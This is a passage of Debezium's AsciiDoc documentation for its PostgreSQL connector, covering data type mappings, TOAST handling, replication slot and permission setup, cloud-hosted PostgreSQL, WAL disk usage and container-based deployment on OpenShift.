+\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|===\n\nWhen the `decimal.handling.mode` property is set to `double`, the connector represents all `DECIMAL` and `NUMERIC` values as Java double values and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `double`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n\n|===\n\nThe last possible setting for the `decimal.handling.mode` configuration property is `string`. In this case, the connector represents `DECIMAL` and `NUMERIC` values as their formatted string representation, and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `string`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n\n|===\n\nPostgreSQL supports `NaN` (not a number) as a special value to be stored in `DECIMAL`\/`NUMERIC` values when the setting of `decimal.handling.mode` is `string` or `double`. In this case, the connector encodes `NaN` as either `Double.NaN` or the string constant `NAN`.\n\n[id=\"postgresql-hstore-type\"]\n=== HSTORE type\n\nWhen the `hstore.handling.mode` connector configuration property is set to `json` (the default), the connector represents `HSTORE` values as string representations of JSON values and encodes them as shown in the following table. When the `hstore.handling.mode` property is set to `map`, the connector uses the `MAP` schema type for `HSTORE` values.\n\n.Mappings for `HSTORE` data type\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`HSTORE`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nExample: output representation using the JSON converter is `{\\\"key\\\" : \\\"val\\\"}`\n\n|`HSTORE`\n|`MAP`\n|n\/a +\n +\nExample: output representation using the JSON converter is `{\"key\" : \"val\"}`\n\n|===\n\n[id=\"postgresql-domain-types\"]\n=== Domain types\n\nPostgreSQL supports user-defined types that are based on other underlying types. When such column types are used, {prodname} exposes the column's representation based on the full type hierarchy.\n\n[IMPORTANT]\n====\nCapturing changes in columns that use PostgreSQL domain types requires special consideration. When a column is defined to contain a domain type that extends one of the default database types and the domain type defines a custom length or scale, the generated schema inherits that defined length or scale.\n\nWhen a column is defined to contain a domain type that extends another domain type that defines a custom length or scale, the generated schema does *not* inherit the defined length or scale because that information is not available in the PostgreSQL driver's column metadata.\n====\n\n[id=\"postgresql-network-address-types\"]\n=== Network address types\n\nPostgreSQL has data types that can store IPv4, IPv6, and MAC addresses. It is better to use these types instead of plain text types to store network addresses. Network address types offer input error checking and specialized operators and functions.\n\n.Mappings for network address types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`INET`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 networks\n\n|`CIDR`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 hosts and networks\n\n|`MACADDR`\n|`STRING`\n|n\/a +\n +\nMAC addresses\n\n|`MACADDR8`\n|`STRING`\n|n\/a +\n +\nMAC addresses in EUI-64 format\n\n|===\n\n[id=\"postgresql-postgis-types\"]\n=== PostGIS types\n\nThe PostgreSQL connector supports all link:http:\/\/postgis.net[PostGIS data types].\n\n.Mappings of PostGIS data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostGIS data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`GEOMETRY` +\n(planar)\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geometry object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see link:http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|`GEOGRAPHY` +\n(spherical)\n|`STRUCT`\n|`io.debezium.data.geometry.Geography` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geography object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|===\n\n[id=\"postgresql-toasted-values\"]\n=== Toasted values\nPostgreSQL has a hard limit on the page size.\nThis means that values that are larger than around 8 KBs need to be stored by using link::https:\/\/www.postgresql.org\/docs\/current\/storage-toast.html[TOAST storage].\nThis impacts replication messages that are coming from the database. Values that were stored by using the TOAST mechanism and that have not been changed are not included in the message, unless they are part of the table's replica identity.\nThere is no safe way for {prodname} to read the missing value out-of-bands directly from the database, as this would potentially lead to race conditions. Consequently, {prodname} follows these rules to handle toasted values:\n\n* Tables with `REPLICA IDENTITY FULL` - TOAST column values are part of the `before` and `after` fields in change events just like any other column.\n* Tables with `REPLICA IDENTITY DEFAULT` - When receiving an `UPDATE` event from the database, any unchanged TOAST column value that is not part of the replica identity is not contained in the event.\nSimilarly, when receiving a `DELETE` event, no TOAST columns, if any, are in the `before` field.\nAs {prodname} cannot safely provide the column value in this case, the connector returns a placeholder value as defined by the connector configuration property, `toasted.value.placeholder`.\n\nifdef::community[]\n[IMPORTANT]\n====\nThere is a problem related to Amazon RDS instances. The `wal2json` plug-in has evolved over the time and there were releases that provided out-of-band toasted values. Amazon supports different versions of the plug-in for different PostgreSQL versions. See https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[Amazon's documentation] to obtain version to version mapping. For consistent toasted values handling:\n\n* Use the `pgoutput` plug-in for PostgreSQL 10+ instances.\n* Set `include-unchanged-toast=0` for older versions of the `wal2json` plug-in by using the `slot.stream.params` configuration option.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-postgresql-to-run-a-debezium-connector\n\/\/ Title: Setting up PostgreSQL to run a {prodname} connector\n[[setting-up-postgresql]]\n== Set up\n\nifdef::community[]\nBefore using the PostgreSQL connector to monitor the changes committed on a PostgreSQL server, decide which logical decoding plug-in you intend to use.\nIf you plan *not* to use the native `pgoutput` logical replication stream support, then you must install the logical decoding plug-in into the PostgreSQL server. Afterward, enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nIf your database is hosted by a service such as link:https:\/\/www.heroku.com\/postgres[Heroku Postgres] you might be unable to install the plug-in. If so, and if you are using PostgreSQL 10+, you can use the `pgoutput` decoder support to capture changes in your database. If that is not an option, you are unable to use {prodname} with your database.\nendif::community[]\n\nifdef::product[]\nThis release of {prodname} supports only the native `pgoutput` logical replication stream. To set up PostgreSQL so that it uses the `pgoutput` plug-in, you must enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nDetails are in the following topics:\n\n* xref:configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in[]\n* xref:setting-up-postgresql-permissions-required-by-debezium-connectors[]\n* xref:setting-privileges-to-permit-debezium-user-to-create-postgresql-publications[]\n* xref:configuring-postgresql-to-allow-replication-with-the-connector-host[]\n* xref:configuring-postgresql-to-manage-debezium-wal-disk-space-consumption[]\n\nendif::product[]\n\nifdef::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in\n\/\/ Title: Configuring a replication slot for the {prodname} `pgoutput` plug-in\n=== Configuring replication slot\n\nPostgreSQL's logical decoding uses replication slots. To configure a replication slot, specify the following in the `postgresql.conf` file:\n\n[source]\n----\nwal_level=logical\nmax_wal_senders=1\nmax_replication_slots=1\n----\n\nThese settings instruct the PostgreSQL server as follows:\n\n* `wal_level` - Use logical decoding with the write-ahead log.\n* `max_wal_senders` - Use a maximum of one separate process for processing WAL changes.\n* `max_replication_slots` - Allow a maximum of one replication slot to be created for streaming WAL changes.\n\nReplication slots are guaranteed to retain all WAL entries that are required for {prodname} even during {prodname} outages. Consequently, it is important to closely monitor replication slots to avoid:\n\n* Too much disk consumption\n* Any conditions, such as catalog bloat, that can happen if a replication slot stays unused for too long\n\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL documentation for replication slots].\n\n[NOTE]\n====\nFamiliarity with the mechanics and link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[configuration of the PostgreSQL write-ahead log] is helpful for using the {prodname} PostgreSQL connector.\n====\nendif::product[]\n\nifdef::community[]\n[[postgresql-in-the-cloud]]\n=== PostgreSQL in the Cloud\n\n[[postgresql-on-amazon-rds]]\n==== PostgreSQL on Amazon RDS\n\nIt is possible to capture changes in a PostgreSQL database that is running in link:https:\/\/aws.amazon.com\/rds\/[Amazon RDS]. To do this:\n\n* Set the instance parameter `rds.logical_replication` to `1`.\n* Verify that the `wal_level` parameter is set to `logical` by running the query `SHOW wal_level` as the database RDS master user.\n This might not be the case in multi-zone replication setups.\n You cannot set this option manually.\n It is link:https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/USER_WorkingWithParamGroups.html[automatically changed] when the `rds.logical_replication` parameter is set to `1`.\n If the `wal_level` is not set to `logical` after you make the preceding change, it is probably because the instance has to be restarted after the parameter group change.\n Restarts occur during your maintenance window, or you can initiate a restart manually.\n* Set the {prodname} `plugin.name` parameter to `wal2json`. You can skip this on PostgreSQL 10+ if you plan to use `pgoutput` logical replication stream support.\n* Initiate logical replication from an AWS account that has the `rds_replication` role.\n The role grants permissions to manage logical slots and to stream data using logical slots.\n By default, only the master user account on AWS has the `rds_replication` role on Amazon RDS.\n To enable a user account other than the master account to initiate logical replication, you must grant the account the `rds_replication` role.\n For example, `grant rds_replication to _<my_user>_`. You must have `superuser` access to grant the `rds_replication` role to a user.\n To enable accounts other than the master account to create an initial snapshot, you must grant `SELECT` permission to the accounts on the tables to be captured.\n For more information about security for PostgreSQL logical replication, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n[IMPORTANT]\n====\nEnsure that you use the latest versions of PostgreSQL 9.6, 10 or 11 on Amazon RDS.\nOtherwise, older versions of the `wal2json` plug-in might be installed.\nSee https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[the official documentation] for the exact `wal2json` versions installed on Amazon RDS.\nIn the case of an older version, replication messages received from the database might not contain complete information about type constraints such as length or scale or `NULL`\/`NOT NULL`. This might cause creation of messages with an inconsistent schema for a short period of time when there are changes to a column's definition.\n\nAs of January 2019, the following PostgreSQL versions on RDS come with an up-to-date version of `wal2json` and thus should be used:\n\n* PostgreSQL 9.6: 9.6.10 and newer\n* PostgreSQL 10: 10.5 and newer\n* PostgreSQL 11: any version\n====\n\n[[postgresql-on-azure]]\n==== PostgreSQL on Azure\n\nIt is possible to use {prodname} with\u202flink:https:\/\/docs.microsoft.com\/azure\/postgresql\/[Azure Database for PostgreSQL], which has support for the `wal2json` and\u202f`pgoutput`\u202fplug-ins, both of which are supported by {prodname} as well.\n\nSet the Azure replication support to\u202f`logical`. You can use the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-cli[Azure CLI] or the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-portal[Azure Portal] to configure this. For example, to use the Azure CLI, here are the link:https:\/\/docs.microsoft.com\/cli\/azure\/postgres\/server?view=azure-cli-latest[`az postgres server`] commands that you need to execute:\n\n```\naz postgres server configuration set --resource-group mygroup --server-name myserver --name azure.replication_support --value logical\n\naz postgres server restart --resource-group mygroup --name myserver\n```\n\n[[postgresql-on-crunchybridge]]\n==== PostgreSQL on CrunchyBridge\n\nIt is possible to use {prodname} with link:https:\/\/crunchybridge.com\/[CrunchyBridge]; logical replication is already turned on. The `pgoutput` plugin is available. You will have to create a replication user and provide correct privileges.\n\n[IMPORTANT]\n====\nWhile using the `pgoutput` plug-in, it is recommended that you configure `filtered` as the {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`]. If you use `all_tables`, which is the default value for `publication.autocreate.mode`, and the publication is not found, the connector tries to create one by using\u202f`CREATE PUBLICATION <publication_name> FOR ALL TABLES;`, but this fails due to lack of permissions.\n====\n\n[[installing-postgresql-output-plugin]]\n=== Installing the logical decoding output plug-in\n\n[TIP]\n====\nSee {link-prefix}:{link-postgresql-plugins}[Logical Decoding Output Plug-in Installation for PostgreSQL] for more detailed instructions for setting up and testing logical decoding plug-ins.\n====\n\n[NOTE]\n====\nAs of {prodname} 0.10, the connector supports PostgreSQL 10+ logical replication streaming by using `pgoutput`.\nThis means that a logical decoding output plug-in is no longer necessary and changes can be emitted directly from the replication stream by the connector.\n====\n\nAs of PostgreSQL 9.4, the only way to read changes to the write-ahead-log is to install a logical decoding output plug-in. Plug-ins are written in C, compiled, and installed on the machine that runs the PostgreSQL server. Plug-ins use a number of PostgreSQL specific APIs, as described by the link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[PostgreSQL documentation].\n\nThe PostgreSQL connector works with one of {prodname}'s supported logical decoding plug-ins to encode the changes in either link:https:\/\/github.com\/google\/protobuf[Protobuf format] or link:http:\/\/www.json.org\/[JSON] format.\nSee the documentation for your chosen plug-in to learn more about the plug-in's requirements, limitations, and how to compile it.\n\n* link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/master\/README.md[`protobuf`]\n* link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/README.md[`wal2json`]\n\nFor simplicity, {prodname} also provides a Docker image based on a vanilla PostgreSQL server image on top of which it compiles and installs the plug-ins. You can link:https:\/\/github.com\/debezium\/docker-images\/tree\/master\/postgres\/9.6[use this image] as an example of the detailed steps required for the installation.\n\n[WARNING]\n====\nThe {prodname} logical decoding plug-ins have been installed and tested on only Linux machines. For Windows and other operating systems, different installation steps might be required.\n====\n\n[[postgresql-differences-between-plugins]]\n=== Plug-in differences\n\nPlug-in behavior is not completely the same for all cases.\nThese differences have been identified:\n\n* The `wal2json` and `decoderbufs` plug-ins emit events for tables without primary keys.\n* The `wal2json` plug-in does not support special values, such as `NaN` or `infinity`, for floating point types.\n* The `wal2json` plug-in should be used with the `schema.refresh.mode` connector configuration property set to `columns_diff_exclude_unchanged_toast`. Otherwise, when receiving a change event for a row that contains an unchanged `TOAST` column, no field for that column is contained in the emitted change event's `after` field. This is because `wal2json` plug-in messages do not contain a field for such a column.\n+\nThe requirement for adding this is tracked under the link:https:\/\/github.com\/eulerto\/wal2json\/issues\/98[`wal2json` issue 98].\nSee the documentation of `columns_diff_exclude_unchanged_toast` further below for implications of using it.\n\n* The `pgoutput` plug-in does not emit all events for tables without primary keys. It emits only events for `INSERT` operations.\n\nAll up-to-date differences are tracked in a test suite link:https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-connector-postgres\/src\/test\/java\/io\/debezium\/connector\/postgresql\/DecoderDifferences.java[Java class].\n\n[[postgresql-server-configuration]]\n=== Configuring the PostgreSQL server\n\nIf you are using a {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] other than pgoutput, after installing it, configure the PostgreSQL server as follows:\n\n. To load the plug-in at startup, add the following to the `postgresql.conf` file::\n+\n[source,properties]\n----\n# MODULES\nshared_preload_libraries = 'decoderbufs,wal2json' \/\/ <1>\n----\n<1> Instructs the server to load the `decoderbufs` and `wal2json` logical decoding plug-ins at startup. The names of the plug-ins are set in the link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/v0.3.0\/Makefile[`Protobuf`] and link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/Makefile[`wal2json`] make files.\n\n. To configure the replication slot regardless of the decoder being used, specify the following in the `postgresql.conf` file:\n+\n[source,properties]\n----\n# REPLICATION\nwal_level = logical \/\/ <1>\nmax_wal_senders = 1 \/\/ <2>\nmax_replication_slots = 1 \/\/ <3>\n----\n<1> instructs the server to use logical decoding with the write-ahead log.\n<2> instructs the server to use a maximum of `1` separate process for processing WAL changes.\n<3> instructs the server to allow a maximum of `1` replication slot to be created for streaming WAL changes.\n\n{prodname} uses PostgreSQL's logical decoding, which uses replication slots.\nReplication slots are guaranteed to retain all WAL segments required for {prodname} even during {prodname} outages. For this reason, it is important to closely monitor replication slots to avoid too much disk consumption and other conditions that can happen such as catalog bloat if a replication slot stays unused for too long.\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL streaming replication documentation].\n\nIf you are working with a `synchronous_commit` setting other than `on`,\nthe recommendation is to set `wal_writer_delay` to a value such as 10 milliseconds to achieve a low latency of change events.\nOtherwise, its default value is applied, which adds a latency of about 200 milliseconds.\n\n[TIP]\n====\nReading and understanding link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[PostgreSQL documentation about the mechanics and configuration of the PostgreSQL write-ahead log] is strongly recommended.\n====\nendif::community[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-postgresql-permissions-required-by-debezium-connectors\n\/\/ Title: Setting up PostgreSQL permissions for the {prodname} connector\n[[postgresql-permissions]]\n=== Setting up permissions\n\nSetting up a PostgreSQL server to run a {prodname} connector requires a database user that can perform replications.\nReplication can be performed only by a database user that has appropriate permissions and only for a configured number of hosts.\n\nAlthough, by default, superusers have the necessary `REPLICATION` and `LOGIN` roles, as mentioned in xref:postgresql-security[Security], it is best not to provide the {prodname} replication user with elevated privileges.\nInstead, create a {prodname} user that has the the minimum required privileges.\n\n.Prerequisites\n\n* PostgreSQL administrative permissions.\n\n.Procedure\n\n. To provide a user with replication permissions, define a PostgreSQL role that has _at least_ the `REPLICATION` and `LOGIN` permissions, and then grant that role to the user.\n For example:\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE __<name>__ REPLICATION LOGIN;\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-privileges-to-permit-debezium-user-to-create-postgresql-publications\n\/\/ Title: Setting privileges to enable {prodname} to create PostgreSQL publications\n[[postgresql-replication-user-privileges]]\n=== Setting privileges to enable {prodname} to create PostgreSQL publications when you use `pgoutput`\n\nifdef::community[]\nIf you use `pgoutput` as the logical decoding plugin, {prodname} must operate in the database as a user with specific privileges.\nendif::community[]\n\n{prodname} streams change events for PostgreSQL source tables from _publications_ that are created for the tables.\nPublications contain a filtered set of change events that are generated from one or more tables.\nThe data in each publication is filtered based on the publication specification.\nThe specification can be created by the PostgreSQL database administrator or by the {prodname} connector.\nTo permit the {prodname} PostgreSQL connector to create publications and specify the data to replicate to them, the connector must operate with specific privileges in the database.\n\nThere are several options for determining how publications are created.\nIn general, it is best to manually create publications for the tables that you want to capture, before you set up the connector.\nHowever, you can configure your environment in a way that permits {prodname} to create publications automatically, and to specify the data that is added to them.\n\n{prodname} uses include list and exclude list properties to specify how data is inserted in the publication.\nFor more information about the options for enabling {prodname} to create publications, see {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`].\n\nFor {prodname} to create a PostgreSQL publication, it must run as a user that has the following privileges:\n\n* Replication privileges in the database to add the table to a publication.\n* `CREATE` privileges on the database to add publications.\n* `SELECT` privileges on the tables to copy the initial table data. Table owners automatically have `SELECT` permission for the table.\n\nTo add tables to a publication, the user be an owner of the table.\nBut because the source table already exists, you need a mechanism to share ownership with the original owner.\nTo enable shared ownership, you create a PostgreSQL replication group, and then add the existing table owner and the replication user to the group.\n\n.Procedure\n\n. Create a replication group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE _<replication_group>_;\n----\n. Add the original owner of the table to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT REPLICATION_GROUP TO __<original_owner>__;\n----\n. Add the {prodname} replication user to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT REPLICATION_GROUP TO __<replication_user>__;\n----\n. Transfer ownership of the table to `<replication_group>`.\n+\n[source,sql,subs=\"+quotes\"]\n----\nALTER TABLE __<table_name>__ OWNER TO REPLICATION_GROUP;\n----\n\nFor {prodname} to specify the capture configuration, the value of {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`] must be set to `filtered`.\n\n\/\/ Type: procedure\n\/\/ ModuleID: configuring-postgresql-to-allow-replication-with-the-connector-host\n[[postgresql-host-replication-permissions]]\n=== Configuring PostgreSQL to allow replication with the {prodname} connector host\n\nTo enable {prodname] to replicate PostgreSQL data, you must configure the database to permit replication with the host that runs the PostgreSQL connector.\nTo specify the clients that are permitted to replicate with the database, add entries to the PostgreSQL host-based authentication file, `pg_hba.conf`.\nFor more information about the `pg_hba.conf` file, see link:https:\/\/www.postgresql.org\/docs\/10\/auth-pg-hba-conf.html[the PostgreSQL] documentation.\n\n.Procedure\n\n* Add entries to the `pg_hba.conf` file to specify the {prodname} connector hosts that can replicate with the database host.\nFor example,\n+\n.`pg_hba.conf` file example:\n[source]\n----\nlocal replication <youruser> trust \/\/ <1>\nhost replication <youruser> 127.0.0.1\/32 trust \/\/ <2>\nhost replication <youruser> ::1\/128 trust \/\/ <3>\n----\n<1> Instructs the server to allow replication for `<youruser>` locally, that is, on the server machine.\n<2> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV4`.\n<3> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV6`.\n\n[NOTE]\n====\nFor more information about network masks, see link:https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-net-types.html[the PostgreSQL documentation].\n====\n\nifdef::community[]\n[[supported-postgresql-topologies]]\n=== Supported PostgreSQL topologies\n\nThe PostgreSQL connector can be used with a standalone PostgreSQL server or with a cluster of PostgreSQL servers.\n\nAs mentioned {link-prefix}:{link-postgresql-connector}#postgresql-limitations[in the beginning], PostgreSQL (for all versions <= 12) supports logical replication slots on only `primary` servers. This means that a replica in a PostgreSQL cluster cannot be configured for logical replication, and consequently that the {prodname} PostgreSQL connector can connect and communicate with only the primary server. Should this server fail, the connector stops. When the cluster is repaired, if the original primary server is once again promoted to `primary`, you can restart the connector. However, if a different PostgreSQL server _with the plug-in and proper configuration_ is promoted to `primary`, you must change the connector configuration to point to the new `primary` server and then you can restart the connector.\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-postgresql-to-manage-debezium-wal-disk-space-consumption\n\/\/ Title: Configuring PostgreSQL to manage {prodname} WAL disk space consumption\n[[postgresql-wal-disk-space]]\n=== WAL disk space consumption\nIn certain cases, it is possible for PostgreSQL disk space consumed by WAL files to spike or increase out of usual proportions.\nThere are several possible reasons for this situation:\n\n* The LSN up to which the connector has received data is available in the `confirmed_flush_lsn` column of the server's `pg_replication_slots` view. Data that is older than this LSN is no longer available, and the database is responsible for reclaiming the disk space.\n+\nAlso in the `pg_replication_slots` view, the `restart_lsn` column contains the LSN of the oldest WAL that the connector might require. If the value for `confirmed_flush_lsn` is regularly increasing and the value of `restart_lsn` lags then the database needs to reclaim the space.\n+\nThe database typically reclaims disk space in batch blocks. This is expected behavior and no action by a user is necessary.\n\n* There are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. This situation can be easily solved with periodic heartbeat events. Set the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-interval-ms[`heartbeat.interval.ms`] connector configuration property.\n\n* The PostgreSQL instance contains multiple databases and one of them is a high-traffic database. {prodname} captures changes in another database that is low-traffic in comparison to the other database. {prodname} then cannot confirm the LSN as replication slots work per-database and {prodname} is not invoked. As WAL is shared by all databases, the amount used tends to grow until an event is emitted by the database for which {prodname} is capturing changes. To overcome this, it is necessary to:\n\n** Enable periodic heartbeat record generation with the `heartbeat.interval.ms` connector configuration property.\n** Regularly emit change events from the database for which {prodname} is capturing changes.\nifdef::community[]\n\n+\nIn the case of `wal2json` decoder plug-in, it is sufficient to generate empty events. This can be achieved for example by truncating an empty temporary table. For other decoder plug-ins, the recommendation is to create a supplementary table for which {prodname} is not capturing changes.\nendif::community[]\n\n+\nA separate process would then periodically update the table by either inserting a new row or repeatedly updating the same row.\nPostgreSQL then invokes {prodname}, which confirms the latest LSN and allows the database to reclaim the WAL space.\nThis task can be automated by means of the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-action-query[`heartbeat.action.query`] connector configuration property.\n\nifdef::community[]\n[TIP]\n====\nFor users on AWS RDS with PostgreSQL, a situation similar to the high traffic\/low traffic scenario can occur in an idle environment. AWS RDS causes writes to its own system tables to be invisible to clients on a frequent basis (5 minutes).\nAgain, regularly emitting events solves the problem.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-postgresql-connectors\n\/\/ Title: Deployment of {prodname} PostgreSQL connectors\n[[postgresql-deployment]]\n== Deployment\n\nifdef::community[]\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} PostgreSQL connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-postgres\/{debezium-version}\/debezium-connector-postgres-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka, PostgreSQL and Kafka Connect with the PostgreSQL connector already installed and ready to run. You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} PostgreSQL connector, add the connector files to Kafka Connect, create a custom container to run the connector, and add connector configuration to your container. Details are in the following topics:\n\n* xref:deploying-debezium-postgresql-connectors[]\n* xref:descriptions-of-debezium-postgresql-connector-configuration-properties[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: deploying-debezium-postgresql-connectors\n\/\/ Title: Deploying {prodname} PostgreSQL connectors\n[[postgresql-deploying-a-connector]]\n=== Deploying connectors\n\nTo deploy a {prodname} PostgreSQL connector, you need to build a custom Kafka Connect container image that contains the {prodname} connector archive and push this container image to a container registry.You then need to create two custom resources (CRs):\n\n* A `KafkaConnect` CR that configures your Kafka Connector and that specifies the name of the image that you created to run your {prodname} connector. You apply this CR to the OpenShift Kafka instance.\n\n* A `KafkaConnector` CR that configures your {prodname} PostgreSQL connector. You apply this CR to the OpenShift instance where Red Hat AMQ Streams is deployed.\n\n.Prerequisites\n\n* PostgreSQL is running and you performed the steps to {LinkDebeziumUserGuide}#setting-up-postgresql-to-run-a-debezium-connector[set up PostgreSQL to run a {prodname} connector].\n\n* link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] was used to set up and start running Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} PostgreSQL container for Kafka Connect:\n.. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[PostgreSQL connector archive].\n\n.. Extract the {prodname} PostgreSQL connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=\"+macros\"]\n----\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-postgresql\n\u2502 \u251c\u2500\u2500 ...\n----\n\n.. Create a Docker file that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following:\n+\n[subs=\"+macros,+attributes\"]\n----\npass:quotes[*cat <<EOF >debezium-container-for-postgresql.yaml*] \/\/ <1>\npass:quotes[*FROM {DockerKafkaConnect}*]\npass:quotes[*USER root:root*]\npass:quotes[*COPY .\/my-plugins\/ \/opt\/kafka\/plugins\/*] \/\/ <2>\npass:quotes[*USER 1001*]\npass:quotes[*EOF*]\n----\n<1> You can specify any file name that you want.\n<2> Replace `my-plugins` with the name of your plug-ins directory.\n+\nThe command creates a Docker file with the name `debezium-container-for-postgresql.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-postgresql.yaml` Docker file that you created in the previous step. From the directory that contains the file, run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-postgresql:latest .\n----\n+\nThis command builds a container image with the name `debezium-container-for-postgresql`.\n\n.. Push your custom image to a container registry such as `quay.io` or any internal container registry. Ensure that this registry is reachable from your OpenShift instance. For example:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman push debezium-container-for-postgresql:latest\n----\n\n.. Create a new {prodname} PostgreSQL `KafkaConnect` custom resource (CR). For example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations: strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n image: debezium-container-for-postgresql \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect 